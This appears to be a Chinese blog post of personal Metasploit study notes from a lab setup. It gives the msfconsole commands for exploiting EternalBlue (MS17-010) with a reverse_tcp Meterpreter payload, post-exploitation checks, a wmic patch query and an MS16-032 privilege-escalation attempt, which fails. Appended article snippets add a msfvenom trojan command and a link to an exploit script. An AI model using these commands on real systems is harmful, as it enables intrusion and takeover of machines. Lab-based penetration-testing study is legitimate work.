Metasploit学习笔记(五)——Meterpreter后渗透之WMIC实战MS16-032本地溢出漏洞

最新推荐文章于 2024-11-09 23:25:24 发布
最新推荐文章于 2024-11-09 23:25:24 发布
阅读量1.6k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: WEB学习 Metasploit 文章标签: 学习 网络 安全 溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43965597/article/details/127208445
本文介绍如何利用WMIC工具实战MS16-032本地溢出漏洞,通过具体步骤演示从获取Meterpreter命令行到最终提权的过程,并分析目标主机的安全补丁情况。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

1. 利用WMIC实战MS16-032本地溢出漏洞

1.1.进入Meterpreter命令行

过程还是如这篇文章详细介绍
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

过程简单来说就是这几步,成功利用反弹shell后就是Meterpreter了

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
//利用永恒之蓝漏洞
set payload windows/x64/meterpreter/reverse_tcp
//设置payload
set LHOST 192.168.92.131
//设置本机IP地址
set RHOSTS 192.168.92.133
//设置受害主机IP
set RPORT 445
//设置端口445,注意该端口共享功能是高危漏洞端口,包括之前分享的139、3389等
exploit
//利用漏洞

在这里插入图片描述

1.2 查看当前权限

//进入meterpretr shell
shell
//查看当前权限
whoami

在这里插入图片描述

1.3 查看用户已获得的权限并提权

getuid
getsystem

在这里插入图片描述

1.4 查看主机信息

systeminfo

在WIN7下查看
在这里插入图片描述
在Kali Shell中查看
在这里插入图片描述
看到安装补丁信息如下
在这里插入图片描述

在WIN7中查看补丁信息

Wmic qfe get Caption,Description,HotFixID,InstalledOn

在这里插入图片描述
可以看到目标机只打了3个补丁,要注意这些输出的结果是不能被直接利用的,使用的方式是去找提权的EXP,然后将系统已经安装的补
丁编号与提权的EXP编号进行对比。比如KiTrap0D (KB979682) 、MS11-011 (KB2393802) 、MS11-080(KB2592799),然后使用没有编
号的EXP进行提权。
因为虚拟机不怎么打补丁,所以我们可以使用很多EXP来提权,这里就用最新的MS16-032来尝试提权,对应的编号是KB3139914

1.5 利用

返回上一级使用back而不是exit,因为exit可能直接跳出msfconsole了

search ms16-032
use windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1

在这里插入图片描述
为什么运行还是失效啦,sad
在这里插入图片描述

详尽的msf——meterpreter——渗透测试教程
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
Metasploit进阶笔记之Meterpreter中的Python扩展
K
11-09 813
Meterpreter 用户长期以来一直希望能够在目标机器的会话上下文中运行任意脚本。虽然 Railgun 提供了调用任意 Win32 API 的能力,但并不支持在客户端进行单次脚本化操作。Meterpreter 现在推出了一个新的扩展,旨在解决此问题。该扩展提供了一个完全在内存中的 Python 解释器,能够加载脚本、运行即时 Python 命令,并提供与 Meterpreter 的绑定。
利用WMIC实战MS16-032本地溢出漏洞
岁月净好
11-29 3264
假设此处我们通过了一系列的渗透测试得到了目标机器的Meterpreter Shell.   首先输入getuid命令查看已经获得的权限,可以看到现在的权限很低,是test权限。 meterpreter > getuid Server username:WIN-S7TJ4B561MT\test 尝试输入getsystem命令提权,结果失败。 meterpreter > getsystem 接着查看系统的已达补丁,传统的方法是在目标机的CMD命令行下输入systeminfo命令,或者通过查
MS16-032 漏洞复现
weixin_34324081的博客
12-19 376
exploit-db的详情: https://www.exploit-db.com/exploits/39574/ Windows: Secondary Logon Standard Handles Missing Sanitization EoP Platform: Windows 8.1, Windows 10, not testing on Windows 7 Class: Elev...
安全】靶场实战-通过MS16-032提权
03-04 1578
漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)。Windows 7Windows 10目标系统需要有2个以上的CPU核心。PowerShell v2.0及更高版本必须正在运行。可根据MS16-032(KB3139914)补丁是否安装,来判断当前版本是否可利用。
ms16_032系统提权
a439017985的博客
02-24 1559
1.利用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b '\x00\xfff\x0a' lhost=10.10.10.128 --platform windows lport=443 -f exe >/root/test.exe 2.在msf下开启监听 use ex
MS16-032 提权
prettyX的博客
06-16 1193
MS16-032 补丁编号:KB3139914 影响系统版本:Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows 2008 Server、Windows 2012 Server 漏洞下载地址:https://www.exploit-db.com/exploits/39719 系统要求:系统至少有2个以上CPU核心,否则利用脚本无法运行;PowerShell v2.0及以上版本 测试命令: powershell.exe -exec byp
提权实战MS16-075漏洞利用与Meterpreter反弹
本次实战笔记记录了一次关于利用MS16-075漏洞进行提权的过程,该漏洞是Windows SMB服务器的特权提升漏洞,其CVE编号为CVE-2016-3225。攻击者通过转发其他服务的身份验证请求,能够在SMB服务中触发漏洞,进而实现权限...
Metasploit进阶笔记之Meterpreter偏执模式
K
11-09 444
在某些场景下,谨慎处理是必要的,这同样适用于生成和管理 Meterpreter 会话。本文档介绍了如何实现一个偏执模式的 Meterpreter payload 和监听器。
Metasploit进阶笔记之Meterpreter无阶段模式
最新发布
K
11-09 996
Metasploit 长期以来一直支持其工具集中的分阶段和无阶段有效载荷的混合。这种有效载荷的组合为渗透测试人员在执行利用时提供了大量的选择。然而,这个组合中有一个选项一直缺失,那就是无阶段的 Meterpreter 有效载荷。在这篇文章中,我将解释这是什么意思,为什么你应该关注它,并展示 MetasploitMeterpreter 最新更新如何提供这个新的功能,就像 Tod 在他的上次 Wrapup 文章中预示的那样。
利用ms16-032提权并打开3389端口
qq_45405155的博客
12-27 1525
利用ms16-032提权并打开3389端口 1、在VM中创建win 2003,在win2003上安装iis服务并开启服务 2、配置iis服务 3、上传源码及配置网站 给put文件设置权限,添加iis访问权限 设置默认访问页面 index.asp 访问192.168.x.x 4、修改checksql文件进行sql注入 判断注入点 http://192.168.8.130/shownews.asp?id=275 and 1=1 http://192.168.8.130/shownews.asp?id=2
关于ms16-032复现在win7的一些坑(不联网环境下)
weixin_42146445的博客
12-17 667
1.得先允许执行脚本 set-ExecutionPolicy RemoteSigned 要不然是不允许执行.ps1脚本的 2.powershell import 由于没联网,所以我把github上面的invoke_ms16-032.ps1下载下来了。 先用powershell 命令进入powershell命令行。 然后得先执行 import-moudle .\invoke_ms-...
Metasploit(三) Meterpreter基础知识
u010680986的博客
08-29 2310
攻击前期步骤: 1. 启动msfconsole:命令行输入use exploit/windows/smb/ms08_067_netapi 2. 可以通过show options查看设置的条件,默认远程主机不会有内容,需要手动设置,通过set RHOST ip 进行设置目标主机地址,端口也可以设置,设置完成后,可以看到如下图,上面是目标主机的ip和端口信息,下面是本地信息 3. 设置完毕后,输入exploit就可以进入meterpreter shell 基本命令 输入help可以查看所有Met.
内网渗透wmic的使用
01-17 5358
简介 Windows Management Instrumentation (WMI) 是在基于 Windows 的操作系统上管理数据和操作的基础结构。您可以编写 WMI 脚本或应用程序来自动执行远程计算机上的管理任务,而且WMI 还向操作系统和产品的其他部分提供管理数据,例如 System Center Operations Manager(以前称为 Microsoft Operations Manager (MOM))或 Windows远程管理 ( WinRM )。–微软官方文档 WMI可以描述为一
Kali——Meterpreter渗透攻击模块-Metasploit的module模块衍生
qq_63167128的博客
03-07 1377
​ 介绍:本文展示了Meterpreter作为Metasploit模块之一的简要概念讲解及攻击流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。 挂个链接:深信服产业教育中心 Meterpreter模块作为后渗透攻击(该阶段通常从攻陷了目标的一些系统和获取了一部分区域系统管理权限后开始)模块的实施通道,可以根据渗透目标需求进行灵活拓展,涉及范围:信息收集,口令攫取,权限提升,内网拓展等等 ​
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 2021
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
powershell之ms16-032复现
qq_45300786的博客
12-14 762
因为楼主没有合适的靶机,就简单说一下环境要求。 1、存在ms16-032的靶机 2、ms16-032的ps1脚本 3、powershell默认是不能运行脚本的,请自己手动开启(百度) 4、ms16-032脚本:https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 参考文章 http://www.96sec.org/blog/post/209.html https://blo
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值